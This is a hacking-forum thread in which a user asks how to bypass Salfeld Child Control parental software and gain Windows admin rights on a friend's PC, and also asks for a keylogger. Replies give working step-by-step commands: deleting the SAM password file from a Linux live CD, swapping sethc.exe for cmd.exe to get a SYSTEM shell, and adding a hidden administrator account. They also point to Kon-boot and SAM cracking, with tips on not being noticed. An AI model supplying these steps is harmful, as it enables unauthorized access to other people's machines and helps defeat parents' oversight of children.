Obtaining windows admin.

This is the place to bitch, bash, and get help with all things Windows.

Obtaining windows admin.

Postby david522 » Sun Sep 06, 2009 10:24 pm

my friends computer recently got a program put on it called "salfied child control 2009" The program basically limits him to web browsing. Installations are not possible nor is task manager or even cmd... We do not know the admins password so we tried accessing safe mode to go into the default admin account but for some reason his computer auto shut down at the safe mode start up screen. Is there any solutions to obtain the windows admin rights apart from the cmd hack which is not viable because cmd is disabled... Or a keylogger which requieres no install? thanks.
david522
n00b
 
Posts: 2
Joined: Sun Sep 06, 2009 10:19 pm

Re: Obtaining windows admin.

Postby arch » Tue Sep 08, 2009 1:42 pm

I am going to assume that your friend is the rightful owner of the computer.
Note: I am using Windows XP. This process may vary slightly for Windows Vista.

All you need to do is download a live CD version of Linux and burn it. You will be able to use the live CD to boot in to Linux which will give you unrestricted access over the hard drive. Locate where the Windows file system has been mounted. (tip: Look in the /mnt directory).

If you can not find it, try issuing this command:
Code: Select all
mount /mnt/hda1
Navigate to the following directory:

C:/windows/system32/config/
It might look something like this:
Code: Select all
cd /mnt/hda1/WINDOWS/system32/config
Look for a file called SAM. This file contains the hashed passwords for all accounts on the system. If you delete this file, all of your passwords will be reset to blank.
Code: Select all
rm /mnt/hda1/WINDOWS/system32/config/SAM
When you are finished, restart the computer and take the CD out of the drive. You will boot back in to Windows and everything is exactly as it was. ...except the password file.

I hope this information helps.

Arch
arch
n00b
 
Posts: 10
Joined: Sat Jun 27, 2009 1:57 pm

Re: Obtaining windows admin.

Postby Aiden » Tue Sep 08, 2009 3:06 pm

If you can boot to a CD, it might be worth looking into just booting to Linux just for general use, too. You can mount a USB drive if you need to keep data persistent between sessions as well. Just a thought
"When it takes forever to learn all the rules, no time is left for breaking them."
User avatar
Aiden
Administrator
 
Posts: 1080
Joined: Tue Oct 31, 2006 11:11 pm
Location: /usr/bin/perl

Re: Obtaining windows admin.

Postby mikefo » Wed Sep 09, 2009 4:34 am

You could also check out Kon-boot.
mikefo
n00b
 
Posts: 5
Joined: Thu Aug 06, 2009 11:52 pm

Re: Obtaining windows admin.

Postby Thor » Thu Sep 10, 2009 3:06 pm

All the post above are good advice. One thing about resetting a password to blank, is of course the person who originally set it will eventually find out, especially if this is at home or something like that.

For purposes of just getting the password fairly quickly, I would say use something like backtrack, I know it has everything you need to dump the SAM fule and decrypt it.

For purposes of anonymity, I recommend using Druspth's idea of using any other linux live cd, and saving files to a usb while booted into the live distro. You'll find backtrack to be sort of a live distro. You'll also find a few more ways to get that coveted XP pass. Backtrack is easy though. I am gonna imagine that you don't have the required priveledges to install keyloggers and anything at all probably.
User avatar
Thor
htd0rg lieutenant
 
Posts: 440
Joined: Tue Dec 18, 2007 9:39 am
Location: Location Location

Re: Obtaining windows admin.

Postby SLaX » Fri Sep 18, 2009 11:18 am

The hard way is to get a hold of the SAM and crack it. But this is good if you don't want to be noticed. What I do for work is use WinKey. It basically does what Arch said, but in a matter of seconds. Its 180 dollars if you want to buy it, but I don't condone warez on public forums. :D
User avatar
SLaX
Apprentice
 
Posts: 44
Joined: Fri Aug 17, 2007 2:13 pm
AOL: Pyrochild590
Location: Somewhere

Re: Obtaining windows admin.

Postby rundata » Sat Sep 26, 2009 6:38 am

REMOVED
Last edited by rundata on Thu Jun 09, 2011 7:11 am, edited 2 times in total.
User avatar
rundata
n00b
 
Posts: 13
Joined: Sat Sep 26, 2009 12:36 am
Website: http://illegalroot.net
Location: stuck in a hoobajoob

Re: Obtaining windows admin.

Postby Cool_Fire » Thu Oct 15, 2009 9:49 pm

You can also use konboot and bypass the login alltogether.
User avatar
Cool_Fire
Not a sandwich
 
Posts: 1880
Joined: Fri May 09, 2003 1:20 pm
ICQ: 336613081
Website: https://www.insomnia247.nl/
Yahoo Messenger: cool_fire_666
AOL: EvilCoolFire
Location: 41 6d 73 74 65 72 64 61 6d

Re: Obtaining windows admin.

Postby 9c5 » Fri Oct 16, 2009 12:08 pm

Would it not be possible to visit websites based off ip instead of the url? I guess it would depend on the program blocking the websites.
9c5
n00b
 
Posts: 12
Joined: Thu Aug 20, 2009 11:40 pm

Re: Obtaining windows admin.

Postby horze » Fri Oct 16, 2009 10:09 pm

Salfeld child control 2009 really gives parents some power. A very good program in family's whit small children but surely a pain in the ass if your above 12 and your parents uses the program to the limit. I have no advise of how to go round it other than already given. Only wanted to add things to think about. The program makes is possible for parents to get an email each time that the PC starts up or shuts down, something to think about if there are some time limits added. Be sure of that the parents do not have an agreement whit the company that delivers the Internet connection that gives them a specified bill like a phone bill, if that is possible in your country.
horze
Hacker in Training
 
Posts: 53
Joined: Wed Aug 26, 2009 8:33 am

Re: Obtaining windows admin.

Postby dimcode » Mon Aug 06, 2012 6:39 pm

I am going to assume that your friend is the rightful owner of the computer.
Note: I am using Windows XP. This process may vary slightly for Windows Vista.

All you need to do is download a live CD version of Linux and burn it. You will be able to use the live CD to boot in to Linux which will give you unrestricted access over the hard drive. Locate where the Windows file system has been mounted. (tip: Look in the /mnt directory).

If you can not find it, try issuing this command:
Code: Select all
mount /mnt/hda1
Navigate to the following directory:

C:/windows/system32/config/
It might look something like this:
Code: Select all
cd /mnt/hda1/WINDOWS/system32/config
Look for a file called SAM. This file contains the hashed passwords for all accounts on the system. If you delete this file, all of your passwords will be reset to blank.
Code: Select all
rm /mnt/hda1/WINDOWS/system32/config/SAM
When you are finished, restart the computer and take the CD out of the drive. You will boot back in to Windows and everything is exactly as it was. ...except the password file.

I hope this information helps.

Arch
okay, this is good advice but I think that you could change a bit the command right after you've located and mounted the windows hard drive:
Code: Select all
mount /mnt/hda1
. After this, you could do
Code: Select all
cd /mnt/hda1/Windows/System32/
press enter and run this:
Code: Select all
cp sethc.exe sethc.bak
, press enter and enter a last line:
Code: Select all
cp cmd.exe sethc.exe
.

You're done, reboot, then before you log in, press shift 5 times, a command prompt will appear with System privilleges. You can then create another acount that gives admin rights: first type:
Code: Select all
net user yourusername yourpassword /add
then type:
Code: Select all
net localgroup Administrators yourusername /add
.
Reboot and then login with your new account. You might want to add a pa
-> [dimCode] <-
User avatar
dimcode
n00b
 
Posts: 6
Joined: Sun Jun 03, 2012 2:05 pm


Return to ā€œ%sā€ Windows

Who is online

Users browsing this forum: No registered users and 0 guests

cron